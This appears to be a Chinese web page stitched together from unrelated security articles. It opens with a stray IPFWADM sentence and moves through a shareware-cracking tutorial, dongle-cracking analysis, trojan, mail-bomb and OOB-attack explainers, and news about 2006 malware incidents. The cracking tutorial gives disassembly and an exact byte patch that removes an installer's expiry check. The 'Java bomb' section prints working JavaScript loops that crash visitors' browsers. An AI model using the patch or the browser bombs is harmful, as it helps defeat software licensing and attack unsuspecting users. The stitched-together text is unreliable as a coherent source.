在第二版核心前，“IP伪装”是以IP发送管理模块（IPFWADM，IP fw adm）来管理。第二版核心虽然提供了更快、也更复杂的IPCHAINS，但仍旧提供了IPFWADM wrapper来保持向下兼容性。

系统安全系列之暴力破解的方法和技巧

系统安全系列之暴力破解的方法和技巧

作者：hackmaster　来源：赛迪网安全社区

我想今天就向大家介绍一下关于暴力破解的知识和破解经验。这个当然也是我个人的经验，但是对于高手来说应还有其它方面的经验，如果你认为我的经验不足的话，希望能够来信补充一下。

现在就开始介绍暴力破解的原理。对于暴力破解通常是无法得到注册码或是注册码的运算过程太复杂，无法通常计算得到（这里指使用反推法来计算注册码）所以就能够使用修改程序的方法来破解这个软件，这样通常就是暴力破解。

现在将使用暴力破解的软件分一下类型，也好让大家来知道如何对不同的软件进行注册码破解还是暴力破解了。

1.测试版软件

这种软件是属于测试使用的，通常无法注册，这样它只有一个time bomb限制，对于破解它只能使用暴力破解方法了。只要将它的时间炸弹解除就行了。

2.共享软件中不需要注册码输入的形式

这种软件是比较成熟的软件，但是作者通常没有使用注册码保护软件，而是仅做一个time bomb，同上面的一样，所以破解就同上面相同了。

3.共享软件中注册码运算过程过于复杂情况

这样的软件是作者设计时使用了十分复杂的运算过程，你使用反推无法得到它的注册码，所以它也只能使用暴力破解才能使用这个软件。

4.共享软件的提示窗口

通常这种软件是在开始运行的时候有一个提示窗口，最为可气是有的软件提示窗口有一定的时间要求，你必要等10秒才能运行这个软件，所以通常破解它就使用暴力破解了。（这不包括破解出注册码的情况）

5.共享软件使用Key File保护的形式

对于这种软件来说，通常的解密人是比较难破解的，但是使用暴力破解就相当的轻松了，你只要找对地方就可以破解它了。

6.共享软件加壳处理

这种破解是属于暴力破解中最难的一种了，因为如果你没有脱壳知识的话，你将无法使用暴力破解来得到这个软件的破解过程。所以对于这种来说，一定好好学习脱壳知识才能对付这个破解。

好了，现在就开始通常过例子来介绍如何进行暴力破解了。

简介：一个制作软件安装程序，可以制作非常小巧的安装文件，并且支持Win95/98/NT，用它所制作出来的文件非常小只有2-3K，而且不需要SETUP.EXE文件，只要点击鼠标右键选择Install即可，不过你也可以用它制作一个包含SETUP.EXE文件的INF文件包。可生成一片或多片的ZIP或EXE文件，它使用INI file，可以推出多国语言包装。

追踪：由于这个软件我在装入后它通知我这个软件已经过期了，所以就先解决这个过期的问题。我刚开始时使用softice来载入它，但是没有将它分析出来，所以又使用w32dasm这个工具来分析它，使用这个软件来分析这种过期方面的软件是有相当的水平的。所以大家作为一个解密者一定要有这样一个好的工具。

如下：

:004B3882 D805E04A4B00 fadd dword ptr [004B4AE0]

:004B3888 DB7DC8 fstp tbyte ptr [ebp-38]

:004B388B 9B wait

:004B388C E8D366F5FF call 00409F64

:004B3891 DB6DC8 fld tbyte ptr [ebp-38]

:004B3894 DED9 fcompp

:004B3896 DFE0 fstsw ax

:004B3898 9E sahf

:004B3899 7321 jnb 004B38BC

:004B389B 6A00 push 00000000

:004B389D 668B0DE44A4B00 mov cx, word ptr [004B4AE4]

:004B38A4 B202 mov dl, 02

* Possible StringData Ref from Code Obj ->"This version of INF-Tool Lite "

->"is outdated."

|

:004B38A6 B8F04A4B00 mov eax, 004B4AF0

:004B38AB E8383BFAFF call 004573E8

:004B38B0 A180C74C00 mov eax, dword ptr [004CC780]

:004B38B5 8B00 mov eax, dword ptr [eax]

:004B38B7 E894AAF9FF call 0044E350

* Referenced by a (U)nconditional or (C)onditional Jump at Address:

|:004B3899(C)

|

:004B38BC C605ADFC4C0000 mov byte ptr [004CFCAD], 00

:004B38C3 C605ACFC4C0000 mov byte ptr [004CFCAC], 00

:004B38CA B201 mov dl, 01

:004B38CC A120F44000 mov eax, dword ptr [0040F420]

:004B38D1 E8FAF7F4FF call 004030D0

:004B38D6 898644160000 mov dword ptr [esi+00001644], eax

你们是否看到了软件过期的字样了吧，向上看有一个可以跳过这里的jne的命令，估计它就是比较是否过期的地方，但是我们还要确定一下它，将它改之。嘿，果然就是它，你们一试就知道了。这个软件进入后发现也没有输入注册码的地方，所以破解成这样就算是破解了。这个软件的破解也是成功了。

********************************

* 查找：9E 73 21 6A 00 *

* 替换：9E EB 21 6A 00 *

********************************

这个软件就是使用暴力方法破解的，现在来分析一下通常如何进行暴力破解的。

对于暴力破解最好使用W32DASM这种反汇编的软件，为什么呢？这个主要是暴力破解的软件通常都有一个关于使用时间或使用次数的提示窗口，所以你可以记住那个提示窗口后使用W32查找相应的语句就可以得到了出错地方，再查找如何避开这个地方的跳跃之处就可以破解这样的软件了。通常这个就是暴力破解的方法。

大家好好分析上面的例子，我想暴力破解通常都使用这种方法，具体如何破解我想应当使用如下几种方法。

1.调后日期，通常调后一年，这样有时间限制的软件就提示你软件已经过期了，这样大家就可以通常W32分析或使用TRW或SI来载入分析了。

2.查找注册表中关键键值，删除掉后提示过期或要求注册等要求，你就可以下手了。

3.对于有使用次数要求的软件可以查找相应的注册表或文件值，这样也可以破解这个软件。

保护好软件之软件锁的加密与解密

作者：hackmaster　来源：赛迪网安全社区

在现有的各种加密方案中，软件琐是其中的一种。在这里之所以专门讨论这个问题，是因为软件锁加密是现今世界上加密的主流方案。现在希望说明的主要是软件锁加密的安全性问题。

首先从软件锁的硬件方面进行研究。因为软件锁是插在计算机并口上的设备，依靠计算机并口微弱的电压来工作，而计算机并口的电压没有严格统一的标准，从2伏-5伏都有可能，这对于软件锁中的元器件的采用有很大的限制，最早一批的软件锁里面的核心就只是一个EEPROM能够在计算机掉电后仍然保持原有的记录。这种软件锁从硬件上没有加密性可言，只要能够找到相同的EEPROM，就能够完全的复制软件锁。再其后出现了EEPROM+计算机芯片的组合，软件锁不仅能够记录信息，而且能够产生一些数学上的变换。有些软件锁的厂家甚至把EEPROM和计算机芯片合而为一，制成专用的芯片，大大增加了软件锁硬件上的加密程度，但这种方法由于生产上的大批量要求，芯片内的设计不可能修改，一旦被解密者破解了一个芯片，所有同类型的软件锁也就被破解了。最近一年的软件锁设计大多采用了低电压CPU为基础的设计，CPU内部的程序由软件锁厂家自行写入，由于CPU程序是一次写入而且不可修改、不可读出的，安全性也比较高；另外CPU程序是由厂家来写入，厂家可以根据自己的要求随时修改软件锁内部的程序，灵活性也比较高。

其次我们从软件锁软件上来考虑一下这个问题，实际上大多数破解者攻击的只是软件锁和客户的软件方面，真正从硬件角度来破解软件锁的比较少。从结构上来说，一个使用软件锁进行加密的软件分为三个部分：

1、软件锁的驱动程序方面

2、软件锁提供的负责同驱动程序进行通讯的具体语言模块（OBJ、..DLL..）

3、客户软件部分

其中软件琐驱动程序负责计算机用软件锁交换数据，如果这个环节的安全性比较差，那么很容易被软件锁模拟程序钻空子，尤其是交换的数据比较固定而有未加密的情况现更是如此。市面上的“打狗棒”、“WKPE”等都是基于此原理做出来的。其实这个问题很容易防范，只要在通讯过程中加入一些随机的信号就可以防止这种程序的有效运行。

第二部分具体语言的软件锁模块负责同软件驱动程序的通讯，如果驱动程序过于简单或通讯协议过于清晰，可以通过制作一个假的驱动程序来模拟所有软件锁的操作，但这种方法过于复杂，不但要对如何编制设备驱动程序有所了解，还要完全理解软件锁驱动程序的工作原理与通讯方式。所以有些破解者从另一端入手，也就是客户端程序所要调用的具体语言的通讯模块。因为有些客户端模块非常大（大于10K），而且在不同程序中的表征都相同，破解者完全可以写一段小的仿真程序来替换掉原来的软件锁客户端模块，也能达到破解的目的。

最后一部分也就是客户化程序的部分，也往往是破解者攻击的主要部分。因为软件锁的其它部分都是由软件锁的厂家来完成的，都有不同程度的加密和反跟踪成分，只有客户自己的程序是相对简单的，在用户使用的时候如果没有仔细规划一下自己的加密方案的话，所有其它的方面再严也是徒劳的。

从上面的分析我们可以看出，软件锁的使用环节很多，任何一个环节出了问题，都会造成整个加密方案的失败。厂家设计的部分相对要严密一些，而客户的使用方法往往是加密成败的关键。如果某个软件锁的访问最后可以归结为某个条件判别的话，那么一旦在这里被跳过，那么整个加密也就失去作用了。规划一套真正行之有效的加密方案，才能更好的发挥软件锁的保护功效。

以史为鉴:2006年十大安全事件

以史为鉴:2006年十大安全事件
太平洋电脑网
作者：fsa
　　2006年度，国内的互联网环境因接踵而至的信息安全事件一再掀起了波澜。金山毒霸同数千万国内用户一起见证2006年十大安全事件。
　　1.维金蠕虫泛滥，引发企业用户网络瘫痪
　　据金山毒霸反病毒监测中心最新数据显示，“维金（Worm.Viking.m，又名：威金）”恶性蠕虫病毒自6月2日被截获以来，截至6月8日16时，受攻击个人用户已由3000多迅速上升到13647人，数十家企业用户网络瘫痪。这是继“狙击波”病毒爆发后，互联网受到的最严重的一次病毒袭击。
　　2.海底光缆断裂，引发病毒威胁
　　2006年末，由于
地震引发的海底光缆断裂导致使用国外杀毒软件的用户无法及时升级病毒库，面临重大的安全危机。以金山为代表的国内厂商为用户紧急提供了含37天免费服务时间的最新版本，协助用户度过此次危机。此次断缆事件更加彰显出国内信息安全厂商在服务本土化方面的优势。
　　3.熊猫烧香(武汉男生 Worm.WhBoy)以近乎完美的传播方式在年末引发病毒狂潮
　　熊猫烧香病毒利用的传播方式囊括了漏洞攻击、感染文件、移动存储介质、局域网传播、网页浏览、社会工程学欺骗等种种可能的手法。病毒程序本身并不高深，却造成严重的大面积感染，以致达到谈猫色变的程度。
　　4.首例敲诈型病毒现身，用户面临新威胁
　　“敲诈”木马的主要特点是试图隐藏用户文档，让用户误以为文件丢失，病毒乘机则以帮用户恢复数据的名义要求用户向指定的银行账户内汇入定额款项。这也是国内首次出现此类对用户进行“敲诈勒索”的病毒，此后短时间内该木马已经相继出现了多个变种。
　　5.魔鬼波肆虐互联网，导致用户系统崩溃
　　8月14日，金山毒霸反病毒监测中心及时截获了利用系统高危漏洞进行传播的恶性蠕虫病毒——魔鬼波（Worm.IRC.WargBot.a）。作为IRCBot系列病毒的新变种，该病毒主要利用MS06-040漏洞进行主动传播，强势攻击互联网，可造成系统崩溃，网络瘫痪，并通过IRC聊天频道接受黑客的控制。
6.微软发布Vista操作系统，安全性遭受质疑
　　虽然微软声称Windows Vista是历史上最安全的Windows系统，但有关公司进行的测试却表明实际情况并不容乐观。目前已经在Windows Vista中发现了包括存在于其语音识别过程中的等数个安全漏洞，微软用大量新代码和新功能来取代以往的Windows架构，出现Bug的比率自然不容忽视，起码在短期内，Vista并不安全。此前，狙击波、魔鬼波等实例也证明系统漏洞依然是引发大面积爆发病毒的重要原因。
　　7.2006年度的亚洲计算机反病毒大会（AVAR）召开
　　2006年度的亚洲计算机反病毒大会（AVAR）新西兰奥克兰召开。我国公安部、国家计算机病毒应急处理中心的领导，以及国内杀毒厂商等一行参加了本次大会。本次大会的主题是数字安全，重点讨论如何预防网络犯罪。
　　8.互联网协会组织制定恶意软件（俗称“流氓软件”）标准
　　中国互联网协会以行业自律的方式组织30余家互联网从业机构共同研究起草了“恶意软件定义(征求意见稿)”正式对外公布，并向社会公开征求意见。组织成员单位签署并发布《抵制恶意软件自律公约》，设立反恶意软件举报电话，组织会员单位和各省互联网协会会员单位开展抵制恶意软件的自查自纠行动，并根据恶意软件的标准特征组织成员单位开发查杀工具。协会的这一举措，使反流氓软件有标准可循。”
　　9.大量网游帐号被黑，虚拟财产保护刻不容缓
　　2006年截获的病毒中，木马占了近四分之三。虚拟世界财产亦有其实际价值，很多病毒制作者将黑手伸向了网络游戏帐号，尤其是时下比较火爆的《魔兽世界》和《征途》等大型网络游戏。由于大多数年轻的玩家缺乏安全意识，往往容易被不法之徒得手，从而将非法获取的游戏帐号转卖牟取不义之财。尤其《征途》帐号被黑的玩家更是超过了10万。
　　10.垃圾邮件治理任重道远
　　与05年相比，2006年企业用户发现其电子邮件系统中的垃圾邮件有明显增多，这些垃圾邮件主要来自于日益增长的僵尸网络和孜孜不倦的邮件蠕虫。僵尸网络中，黑客的意图可以非常明显的去控制“肉鸡”收集邮件地址，而类似“恶鹰”一样的邮件蠕虫病毒更是把收集地址做为最重要的功能。自动变化的图片、发件人，是垃圾邮件最难根除的重要原因。

黑客知识之各类攻击软件原理与防范
作者：hackmaster　来源：赛迪网安全社区

特洛伊木马原理

BO(Back Oriffice)象是一种没有任何权限限制的FTP服务器程序，黑客先使用各种方法诱惑他人使用BO的服务器端程序，一旦得逞便可通过BO客户端程序经由TCP/IP网络进入并控制远程的Windows的微机。

其工作原理：Boserve.exe在对方的电脑中运行后，自动在win里注册并隐藏起来，控制者在对方上网后通过Boconfig.exe(安装设置的程序)和Boclient.exe(文本方式的控制程序)或Bogui.exe(图形界面控制程序)来控制对方。

网上更有一些害人虫将木马程序和其他应用程序结合起来发送给攻击者，只要对方运行了那个程序，木马一样的会驻留到Windwos系统中。

BO本质上属于客户机/服务器应用程序。它通过一个极其简单的图形用户界面和控制面板，可以对感染了BO（即运行了 BO服务器）的机器操作Windows本身具备的所有功能。

这个仅有123K的程序，水平一流，令那些复杂而庞大的商用远程管理 软件相形见绌。而真正可怕的是：BO没有利用系统和软件的任何漏洞或Bug，也没有利用任何微软未公开的内部API，而完全是利用Windows系统的基本设计缺陷。甚至连普通的局域网防火墙和代理服务器也难以有效抵挡。

BO服务器可通过网上下载、电子邮件、盗版光盘、人为投放等途径传播，并且可极其隐藏地粘贴在其他应用程序。一旦激活，就可以自动安装，创建Windll.dll，然后删除自安装程序，埋名隐姓，潜伏在机器中。外人就可通过BO客户机程序，方便地搜索到世界上任何一台被BO感染并上网的计算机IP地址。通过IP地址就可对其轻易实现网络和系统控制功能。

可获取包括网址口令、拨号上网口令、用户口令、磁盘、CPU，软件版本等详细的系统信息；可删除、复制、检查、查看文件；可运行机内任何一个程序；可捕捉屏幕信息；可上传各种文件；可以查阅、创建、删除和修改系统注册表；甚至可以使计算机重新启动或锁死机器。而所有这些功能的实现，只需在菜单中作一选择，轻摁一键，就可轻松完成。 除了BO外，还有很多原理和它差不多的特洛伊木马程序，例如：“NetSpy”、“Netbus”等。

防范

不要随便运行不太了解的人给你的程序，特别是后缀名为exe的可执行程序。特洛伊木马程序很多，它们的安装服务器有Boserve.exe(122k),NETSPY.EXE(127k)，如果你从Email收到或是DOWN了大小和上述文件一样的EXE文件，运行时可要小心了。运行后如果程序突然消失，或者是无任何反应，那你很可能是被攻击了。这时候你的电脑就完全被别人所控制，他可以复制，删除甚至运行你电脑里的文件和程序。这时你只要到注册表里去修改一下就可以消灭它：运行注册表找到

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\

下的RunServices和RUN键值中的“.EXE”和“NETSPY.EXE”等的键值，将其删除，重新启动你的计算机然后删除Windows\System下的“.EXE”和“NETSPY.EXE”等程序就行了。或用最新版本的杀毒软件，如瑞星90（11），KV300等，你也可以下载一些专门扫除特洛伊木马的软件。
如何防范Back Orifice2000

对于Windows95和Windows98的用户：

检查c:\windows\system目录下是否有UMGR32~1.exe文件，如果有的话请运行Regedit将

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

中UMGT32.exe清除，Reboot你的机器，然后Delete你硬盘上的这个文件。
对于NT的用户：

检查winnt\system32目录下是否有UMGR32~1.exe这个文件，如果有的话请先在任务管理器中对应的进程Kill掉再运行Regedit将路径指向

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Remote Administration Service

然后Delete it，最好Reboot一次你的机器。

邮件炸弹原理

E-MAIL炸弹原本泛指一切破坏电子邮箱的办法，一般的电子邮箱的容量在5，6M以下，平时大家收发邮件，传送软件都会觉得容量不够，如果电子邮箱一下子被几百，几千甚至上万封电子邮件所占据，这是电子邮件的总容量就会超过电子邮箱的总容量，以至造成邮箱超负荷而崩溃。“kaboom3”、“upyours4”、“Avalanche v2.8”就是人们常见的几种邮件炸弹。

防范

⒈不要将自己的邮箱地址到处传播，特别是申请上网帐号时ISP送的电子信箱，那可是要按字节收费的哟！去申请几个免费信箱对外使用，随便别人怎么炸，大不了不要了。

⒉最好用POP3收信，你可以用Outlook 或Foxmail等POP收信工具收取Email。例如用Outlook，你可以选择“工具”/“收件箱助理”，然后点击“添加”在属性窗口可以设定对各种条件的Email的处理方式。如果我们想让超过1024KB的邮件直接从服务器上删除，根本不下载到计算机上，可以在邮件条件框中将“大于”选中，然后输入1024，接着在“执行下列操作”框中选中“从服务器删除”就行了。

⒊当某人不停炸你信箱时，你可以先打开一封信，看清对方地址，然后在收件工具的过滤器中选择不再接收这地址的信，直接从服务器删除。

⒋在收信时，一旦看见邮件列表的数量超过平时正常邮件的数量的若干倍，应当马上停止下载邮件，然后再从服务器删除炸弹邮件。（要用下面提到的工具）

⒌不要认为邮件发送有个回复功能，就可以将发炸弹的人报复回来，那是十分愚蠢的！发件人有可能是用的假地址发信，这个地址也许填得与收件人地址相同。这样你不但不能回报对方，还会使自己的邮箱彻底完结！

⒍你还可以用一些工具软件防止邮件炸弹。

端口攻击原理

这类软件是利用Window95/NT系统本身的漏洞，这与Windows下微软网络协议NetBIOS的一个例外处理程序OOB（Out of Band）有关。只要对方以OOB的方式，就可以通过TCP/IP传递一个小小的封包到某个IP地址的Port139上，该地址的电脑系统即（WINDOWS95/NT）就会“应封包而死”，自动重新开机，你未存档的所有工作就得重新再做一遍了。

你一定会问这个封包到底里面是些什么？会有如此神奇的效果！这不过是一些很小的ICMP（Internet Control Message Protocolata）碎片，当你机器收到这份“礼物”时，你的系统会不停地试图把碎片恢复，当然这是不可能的，它怎么会这样便宜你了！于是你的电脑系统就这样速度越来越慢直至完全死机！而你就只有重新启动。

其实，并不只是Port139会出现问题，只要是使用OOB的开放接受端，都有可能出现症状不一的“电脑狂乱”情形。例如，Identel所用的Port113，据说收到同样的封包也会出问题。常见的端口攻击器有“uKe23”、“voob”、WINNUKE2”。如果你还是用的Windows95，那您就要当心了。

防范

将你的Windows95马上升级到Windows98，首先修正Win95的BUG，在微软主页的附件中有对于Win95和OSR2以前的版本的补丁程序，Win98不需要。然后学会隐藏自己的IP，包括将ICQ中"IP隐藏"打开，注意避免在会显示IP的BBS和聊天室上暴露真实身份，特别在去黑客站点访问时最好先运行隐藏IP的程序。

JAVA炸弹原理

很多网友在聊天室中被炸了以后，就以为是被别人黑了，其实不是的。炸弹有很多种，有的是造成电脑直接死机，有的是通过HTML语言，让你的浏览器吃完你的系统资源，然后你就死机了。 这里我就告诉大家几个java炸弹的原理：

第一个炸弹是javascript类型的炸弹：

＜img src="javascript:n=1;do{window.open('')}while(n==1)"
width="1"＞

这个Javascript语言要求浏览在新窗口中再打开本页。新的页面被打开以后就会同样提出要求，于是浏览器不停地打开新窗口，没几秒钟你就死机了。就算是不死机，你也必须把浏览器中内存中驱除出去，这样，你就被踢出了网络。

下面分析一下这个HTML语言的原理。 分析 "javascript:n=1;do{window.open('')}while(n==1)" ，javascript 是定义运行此语言，n=1 是定义变量 n 等于1， do{ }while(n==1) 指当 n 等于1，的时候运行{ }中间的命令，window.open('') 指打开本窗口，整个语言的意思是，变量 n 赋值为1，如果 n 等于1，那么就打开一个窗口，而 n 永远等于1，就不停地打开新的窗口。

同样道理，也可以利用无限循环的原理看看其他的炸弹。前面的文章中提到了 alert ("欢迎辞") 是用来致欢迎辞的，你可以在网页中加入以下的Javascript 语言：

＜SCRIPT language="LiveScript"＞javascript:n=1;do{alert ("嘿嘿，你死定
了！");}while(n==1)＜/SCRIPT＞

下面介绍一个1999年5月才出炉的java炸弹，威力比上两种都强，大家务必要当心。 我们就不在这里提供效果了！

＜HTML＞
＜BODY＞
＜SCRIPT＞
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x ＜3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
＜/SCRIPT＞
＜/BODY＞
＜/HTML＞

防范

唯一的防范方法就是你在聊天室聊天时，特别是支持HTML的聊天室（比如湛江，新疆等）请你一定记住关掉你浏览器里的java功能，还要记住不要浏览一些来路不明的网站和不要在聊天室里按其他网友发出的超级链接，这样可以避免遭到恶作剧者的攻击。

熊猫烧香病毒案告破 8犯罪嫌疑人被抓获

熊猫烧香病毒案告破 8犯罪嫌疑人被抓获

新华网武汉２月１２日电（记者方政军）湖北省公安厅１２日宣布，根据统一部署，湖北网监在浙江、山东、广西、天津、广东、四川、江西、云南、新疆、河南等地公安机关的配合下，一举侦破了制作传播“熊猫烧香”病毒案，抓获李俊（男，２５岁，武汉新洲区人）、雷磊（男，２５岁，武汉新洲区人）等８名犯罪嫌疑人。这是我国破获的国内首例制作计算机病毒的大案。

据介绍，２００６年底，我国互联网上大规模爆发“熊猫烧香”病毒及其变种，该病毒通过多种方式进行传播，并将感染的所有程序文件改成熊猫举着三根香的模样，



同时该病毒还具有盗取用户游戏账号、ＱＱ账号等功能。该病毒传播速度快，危害范围广，截至案发为止，已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏，引起社会各界高度关注。《瑞星２００６安全报告》将其列为十大病毒之首，在《２００６年度中国大陆地区电脑病毒疫情和互联网安全报告》的十大病毒排行中一举成为“毒王”。

今年１月中旬，湖北省网监部门根据公安部公共信息网络安全监察局的部署，对“熊猫烧香”病毒的制作者开展调查。经查，熊猫烧香病毒的制作者为湖北省武汉市李俊，据李俊交代，其于２００６年１０月１６日编写了“熊猫烧香”病毒并在网上广泛传播，并且还以自己出售和由他人代卖的方式，在网络上将该病毒销售给１２０余人，非法获利１０万余元。经病毒购买者进一步传播，导致该病毒的各种变种在网上大面积传播，对互联网用户计算机安全造成了严重破坏。李俊还于２００３年编写了“武汉男生”病毒、２００５年编写了“武汉男生２００５”病毒及“ＱＱ尾巴”病毒。另外，本案另有几个重要犯罪嫌疑人雷磊（男，２５岁，武汉新洲区人）、王磊（男，２２岁，山东威海人）、叶培新（男，２１岁，浙江温州人）、张顺（男，２３岁，浙江丽水人）、王哲（男，２４岁，湖北仙桃人）通过改写、传播“熊猫烧香”等病毒，构建“僵尸网络”，通过盗窃各种游戏和ＱＱ账号等方式非法牟利。

目前，李俊、雷磊等８名犯罪嫌疑人已被刑事拘留。

从暗偷到明抢 黑客地下产业链泛滥

作者:中国经营报

在全社会对流氓软件一片喊打的声势下，大网站已经放弃了依靠流氓软件骗取点击率、Alexa排名的行为。但黑客地下产业链正在集体转战到危害性更强的疯狂“盗窃”网络财富的线路上。

2月7日，更加凶猛的“熊猫烧香”最新变种病毒纷纷被各大安全软件公司截获。同时也代表了“熊猫烧香”病毒编制者，在先期提出“罢手，不再继续这一病毒生命”的声明后，背信弃义，为利益再度出手。

瑞星反病毒工程师史瑀分析认为：“其行为(宣布停止而又再出手)，说明病毒编制者心理也非常矛盾，因此我推断‘熊猫烧香’背后是一个小集团集体行为，而非独立个人行为。编制者本想停手，但受到上家压力或诱惑，只能选择将制造病毒工作继续下去。”

这也成为刚刚过去的一年中，病毒发展的规律——病毒已经从带有部分个人宣泄色彩的问题程序，完全转变为一种机构商业犯罪工具。

九成以上是网络土匪

1月31日，在瑞星发布的《2006年度中国大陆地区电脑病毒疫情&互联网安全报告》(以下简称《安全报告》)中显示，2006年截获的新病毒超过23万个，数量几乎相当于过往数十年计算机历史上产生的病毒数量总和。而且如此多的新病毒的突出特点是，90%以上带有明显的利益特征，有窃取个人资料、各种账号密码等行为。且在2006年危害性最强的十大病毒中，九个属于盗窃为目的病毒。

2006年诞生了第一个勒索型病毒，病毒控制者会通过远程操作方式将个人用户单机文件加密，而后通过各种联络手段找到被感染用户，要求其交出一定赎资换取破解密码。“这已经和刑事犯罪没有了任何区别。”史瑀表示。

病毒编制完全趋利是另外一个突出表现。出现如此多的病毒，大部分并非技术上有创新的作品，而是通过拼凑出来的变种产品，病毒质量明显下降。“盗亦有道。”史瑀表示：“过去的病毒编制者，大部分只是展现自己的软件水平即可。”像CIH作者台湾陈盈豪那样，以破坏为目的只是极少数。而且如小说中武林用毒高手，研制病毒的同时制造相克制的解药。“即：病毒编制者大部分为恢复数据做了良好的准备。”

但2006年爆发的病毒一个突出的表现就是编制者越来越不讲道行。有网络安全专家直言：只做粗制滥造的毒，而根本就没想过解药的事情。

这给杀毒软件企业造成了相当大的麻烦。就如同放置了一枚枚劣质炸弹一样。病毒程序本身存在大量BUG，对数据文件产生大量不可逆转的毁坏。

“熊猫烧香”打破黑色产业的沉默

《安全报告》同时指出：病毒另一大发展趋势，开始从“暗偷”转为“明抢”。“熊猫烧香”是一个突出的表现，它打破了一个黑色产业的沉默。

“熊猫烧香”在窃取网络财富的同时，这个病毒将感染者的EXE文件图标全部改成QQ的图标之一“熊猫烧香”，让所有的中毒者一目了然地察觉到。

史瑀分析：或许这只是病毒编制者的一个病毒程序的失误而已，无意中调用了QQ的某个图标。但后来他没有去改正，这表明他的心理意识上，将病毒盗窃从暗偷发展到了明抢的地步。他已经不在乎公众发现，这让人们相当心寒。

对此，一位网络安全专家直言：如此嚣张也是对整个“网络社会”的一次讽刺和嘲弄。他认为：目前中国脆弱的网络监察安全体系令人担忧。

该人士认为：“从理论上，通过种种痕迹，可以最终找出大量病毒的幕后操手，但历次病毒泛滥，最终由于各种原因，大事化小，小事化了。而就是这种情况使得病毒编制者有恃无恐。”

再发展下去，不光是软件的问题了，完全依靠杀毒软件对抗愈演愈烈的盗窃型病毒已经如杯水车薪。目前急需一次标志性的事件来给网络病毒编制者一次震慑，例如成功抓获一些违法者等等。

其实，通过对病毒获利的产业链环节加强管理，完全可以抑制事态发展。

以“熊猫烧香”为例，它属于典型的波特类病毒，其病毒机理是在感染者的机器中，种植一个很小的下载器，其下载目标根据特定网站提供的下载列表操纵。病毒播种者播种时，没有明确的目的，而在后期拿到有商业目的的订单后，启动下载列表来达到不可告人的目的。

下载列表所在的网站是一个侦破方向。因为每一个网站域名持有者在注册机构是有登记的。但现在问题是很多登记是假的，域名注册机构从营销发展业绩的角度出发，不论身份证件真假，交付几十元的年费就可以得到域名。“此外波特类病毒常常盗用域名，而更多的域名来自海外，国内网络监察机构管理更加困难。”史瑀介绍：“针对域名管理上的加强管理有助于网络安全的建设。”

此外，从销赃环节严把，也有机会剿灭类似犯罪现象。“这和城市自行车盗窃现象一样，有图便宜买的，就教唆了别人去偷。”上述网络安全专家表示：“目前各类网游装备交易网站大量的出现，以及在广大学生群体中日渐热炒的QQ太阳标事件(腾讯推出的，按在线时间划分QQ级别，拥有者根据不同级别可以得到不同级别服务或荣誉)都在助长盗窃的发生。”

只有监察机构能从“产、销”两个环节真正管理起来，打掉一批黑客，才有可能对这种黑色产业有所遏制。

专家警告:情人节电子邮件可能携带病毒

cnbeta 【转载】

情人节日趋临近，计算机病毒也开始借节日传播。最近，美国网络安全公司“PandaLabs” 监测到大量到名为“Nurech.A”的计算机病毒。专家警告，类似病毒可能借情人节电子邮件散布,网民要提高警觉。

PandasLabs技术部门主任柯伦斯警告说:“情人节期间的大量电子邮件可能不怀好意,内含恶意程序代码.网民看到类似'只有你与我'或者'我心直到天长地久'等名称的电子邮件时都应特别小心。”

　　如果开启电子邮件附加的类似“postcard.exe”等电子贺卡文件，计算机可能就被感染病毒.赛门铁克称,监测到附有木马程序等病毒的“大量垃圾邮件”.这次又以新一代木马病毒“Trojan.Peacomm”或“暴风木马“为主。

　　赛门铁克表示：“恶意散发电子有点的人可能以'我心属于你'等作为邮件主题。”

熊猫变金猪，用户变鱼肉：

　　相对于2003年的冲击波、2004年的震荡波和2005年的灰鸽子带来的灾难性后果而言，2006年对计算机业界来说基本上是相安无事的一年。然而，于2006年11月中旬首次发作的“熊猫烧香”病毒却使用户在2007年饱受着巨大的煎熬。

　　回首两个多月来的是是非非，一个病毒已把“几家欢乐几家愁”的众生相演绎得淋漓尽致。



[熊猫烧香，不是保佑而是诅咒]

　　第一，病毒制造者乐此不疲！一方面“熊猫烧香”病毒来势汹汹，令用户谈“国宝”色变、惶恐不安，“武汉男孩”在成就感和充实感中享受着变态的乐趣。另一方面，“熊猫烧香”变种剑指网络游戏的账号及装备，病毒制造者在产销一条龙的产业链中大发不义之财。第二，安全厂商乐不可支。“熊猫烧香”在令互联网用户烦闷不安的同时，也为杀毒软件厂商创造了施展拳脚、俘虏用户的契机。不同的安全厂商为达目的，都使出了“打击对手，抬高自己”的伎俩。曾几何时，安全厂商自成国内、国外两派，在唇枪舌战中把追名逐利的丑态暴露无遗。

　　



[用免费吸引用户！安全厂商想借“国宝”发财]

　　第三，有心人士乐在其中。“熊猫烧香”因有着让人闻风丧胆的破坏力而成为知名度极高的词汇，其背后的始作俑者令人既痛恨又好奇。于是，业界不断出现有心人士自称病毒作者的闹剧，想借“熊猫”出名的心思昭然若揭。

　　“熊猫烧香”病毒不断变种，杀毒软件厂商见缝插针！一边是猖狂无比的“国宝”，另一边又是各打如意算盘的“门神”，互联网用户手无寸铁，有的只是被动受虐的悲哀。

　　熊猫保佑，但愿用户早日脱离任人摆布甚至遭人鱼肉的窘境。



[卡巴瑞星口水战！15%的数字显示用户的无奈]